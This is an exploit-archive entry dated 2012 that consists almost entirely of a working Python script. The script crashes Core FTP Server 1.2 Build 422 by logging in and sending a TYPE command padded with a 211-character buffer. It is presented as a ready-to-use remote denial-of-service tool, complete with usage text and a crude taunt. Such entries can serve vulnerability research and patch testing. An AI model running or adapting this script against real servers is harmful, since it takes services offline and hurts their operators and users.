id: 17556
date: 02/22/2012
title: Core FTP Server 1.2 Build 422 DoS exploit
author: dmnt
cves: 

# Exploit Title: Core FTP Server 1.2 Build 422 remote DoS exploit
# Author: dmnt
# Software Link: http://www.coreftp.com/server/download/CoreFTPServer.exe
# Version: Core FTP Server 1.2 Build 422
# Tested on: Windows 7
# CVE : 0 day

# (x)dmnt 2012
# -*- coding: windows-1252 -*-

import socket
import sys, time

evil_buffer = "A"*211

def help_info():
    print ("Usage: corekill <host> <login> <password>\n")

def dos_it(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(2048)
    print "[+] Connected"
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    time.sleep(3)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] Send evil commands"
    time.sleep(3)
    sock.send("type %s\r\n" %evil_buffer)
    time.sleep(3)
    sock.send("Burn, muthfcka, burn!\r\n")
    sock.close()

print ("\nCore FTP Server 1.2 Build 422 remote DoS exploit\n(x)dmnt 2012\n")

if len(sys.argv) < 4:
    help_info()
    sys.exit(1)

else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    dos_it(hostname,username,passwd)
    dos_it(hostname,username,passwd)
    print "\nServer killed\r\nWait a lot fot crash/restart"
    sys.exit(0)



#  0day.today [2023-03-21]  #